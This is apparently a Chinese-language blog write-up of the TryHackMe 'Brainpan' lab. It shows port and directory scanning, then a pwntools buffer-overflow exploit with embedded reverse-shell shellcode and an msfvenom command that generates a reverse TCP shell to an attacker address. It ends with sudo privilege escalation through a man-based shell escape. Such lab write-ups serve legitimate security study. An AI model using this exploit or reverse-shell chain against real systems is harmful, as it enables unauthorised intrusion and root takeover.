首页 > 其他分享 >tryhackme-Brainpan(脑板)

tryhackme-Brainpan(脑板)

时间:2024-07-15 21:52:48浏览次数:9  
标签:shell 10000 Brainpan 端口 tcp 9999 脑板 payload tryhackme

信息收集

首先使用nmap进行端口扫描

nmap -sT -p- --min-rate 10000 -Pn target -oA openPort

结果如下

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-15 09:31 EDT
Warning: 10.10.133.105 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.133.105
Host is up (0.24s latency).
Not shown: 63700 closed tcp ports (conn-refused), 1833 filtered tcp ports (no-response)
PORT      STATE SERVICE
9999/tcp  open  abyss
10000/tcp open  snet-sensor-mgmt

Nmap done: 1 IP address (1 host up) scanned in 49.24 seconds

开放了999910000端口,因为nmap报了一个错误,我以为有些端口被过滤了,但是通过多次扫描,发现就是开放了两个端口
使用-sV扫描发现目标的10000端口开放的是python共享的web服务,而9999端口是运行着一个二进制程序,我们需要找到这个二进制文件并分析他

使用gobuster10000端口进行目录扫描

通过扫描得到一个/bin的目录,访问得到二进制程序

接下来就是二进制漏洞的常规思路了,我这里就不在意义叙述,通过一系列的测试,我得到最终的exploit.py

from pwn import *
context(log_level='debug')

p = remote("10.10.3.224",9999)

offset = 524
payload = b"A" * offset
payload += b"\xf3\x12\x17\x31"	# 0x311712f3 
payload += b"\x90" * 16
payload += (
	b"\xdd\xc5\xd9\x74\x24\xf4\x5f\xba\x71\x3c\x48\x8a\x29\xc9"
	b"\xb1\x12\x31\x57\x17\x83\xef\xfc\x03\x26\x2f\xaa\x7f\xf9"
	b"\x94\xdd\x63\xaa\x69\x71\x0e\x4e\xe7\x94\x7e\x28\x3a\xd6"
	b"\xec\xed\x74\xe8\xdf\x8d\x3c\x6e\x19\xe5\xb4\x99\x0c\x48"
	b"\xa0\x9b\xae\xa3\x6d\x15\x4f\x73\xeb\x75\xc1\x20\x47\x76"
	b"\x68\x27\x6a\xf9\x38\xcf\x1b\xd5\xcf\x67\x8c\x06\x1f\x15"
	b"\x25\xd0\xbc\x8b\xe6\x6b\xa3\x9b\x02\xa1\xa4"
)

p.send(payload)

最后一段的payload +=shellcode需要使用msfvenom生成自己对应的IP和Port,命令如下

msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.9.213.189 LPORT=4444 -f c -b "\x00" EXITFUNC=thread

初始访问权限

nc本地监听,然后运行exploit.py得到shell


接着使用python -c "import pty;pty.spawn('/bin/bash')"获得一个稳定shell

权限提升

查找suid提权

at查找到了提权的方法,但是并没有成功
接着sudo -l查看可以执行的命令

可以不使用密码身为root用户运行/home/anansi/bin/anansi_util程序

运行发现该程序有三个选项,分别执行ip addresstopmanman中可以自定义参数
man是可以直接获取shell的,直接提权成功

标签:shell,10000,Brainpan,端口,tcp,9999,脑板,payload,tryhackme
From: https://www.cnblogs.com/Junglezt/p/18304022

相关文章

  • tryhackme-Gatekeeper(守门人)
    信息收集首先使用nmap进行端口扫描,结果如下nmap-sT-p---min-rate10000-oAopenPortnmap-sV-O-A-pport1,port2,portN-oAversionnmap--script=smb..-p135,139,445-oA445Port#Nmap7.94SVNscaninitiatedSatJul1323:05:092024as:nmap-sT-p---mi......
  • tryhackme-Buffer Overflow Prep(缓冲区溢出准备)
    前景概述最开始接触二进制方式是因为参加比赛缺少一个pwn手,慢慢的学习在二进制方面懂了很多,学习了C和C++、基本的汇编语法、pwndbg、ollydbg等调试工具,以及在做pwn题目是相关的工具pwntools,学习了栈相关的基本知识,栈溢出相关的一些姿势,例如:ret2text、ret2plt、ret2shellcode、......
  • Brainpan(VulnHub)
    Brainpan1、nmap2、web渗透随便看看目录爆破使用不同工具,不同字典进行爆破9999端口分析10000端口分析字符串信息中,提示这个程序不能运行在DOS模式下,然后有32个A,还有一行关于复制字节到缓冲区的信息,还有一行比较奇怪的字符shitstorm,有可能会是密码,接下来就是之......
  • tryhackme-Boiler CTF
    信息收集使用nmap对靶机进行信息收集根据扫描开放的端口,先访问21端口进行初步探测并没有得到有用的提示,继续访问80端口进行探测根据页面回显,靶机应该是一个ubuntu的操作系统,可能有隐藏目录,使用gobuster进行目录扫描gobusterdir-uhttp://10.10.229.228/-w/usr/share/......
  • TryHackMe - Alfred
    本文相关TryHackMe实验房间链接:TryHackMe|WhySubscribe本文相关介绍:本次实验我们将学习如何利用Jenkins的错误配置来获取目标的初始shell,然后再利用Windows身份验证令牌(tokens)执行权限提升。 本次实验目标IP:10.10.152.218Task1-InitialAccess(初始访问)利......
  • tryhackme-Expose(暴露)
    信息收集使用nmap对靶机进行端口扫描这里我在枚举21端口和1883端口并没有获得任何信息,接着访问1337端口进行信息收集什么都没有,接着进行目录扫描这里由于我的wordlists的问题,并没有扫描到想要的目录,不过也扫描到了一些常规的目录通过参考wp,得到目录名为admin_101,其实在/a......
  • tryhackme-Valley(古)
    信息收集首先对靶机进行端口扫描占时扫描到开放端口22和80端口,访问80端口有两个按钮,一个按钮是展示的照片,一个按钮是照片的价格,这里透漏了一些个人信息,例如用户名可能为Valley,他的公司是premire自习观察url得到两个目录pricing和gallery,访问查看访问note.txt并没有......
  • tryhackme-Retro(复古的)
    题目没有给太多的描述,但是根据硬币,复古的得知这是一个像素,复古,FC游戏的爱好者,之前游戏厅里的游戏信息收集首先对靶机进行端口扫描通过扫描得知一共开放80和3389这两个端口访问80端口发现是IIS的默认页面使用gobuster进行目录扫描扫描到/retro目录,访问该页面这里我访问......
  • tryhackme-Anthem(国歌)
    根据题目描述,这是一个让我们练习的简单Windows机器信息收集首先对靶机进行端口扫描加入-Pn参数是因为Windows默认开启防火墙拒绝icmpping数据包根据开放端口80和3389猜测到后续可能会远程连接靶机接着访问80端口进行信息收集根据title和网页标题,可以看出网站的域名为Anth......
  • tryhackme-Source(来源)
    根据题目描述,这是一个webmin的应用程序,虽然没有了解过,可以通过开源信息搜索查看通过官网可以看出,这是一个资源信息态势图信息收集使用nmap进行端口扫描暂时扫描出靶机开放两个端口22和10000端口访问10000端口发现下方提示,说明服务运行在SSLmode,也就是使用https访问进入......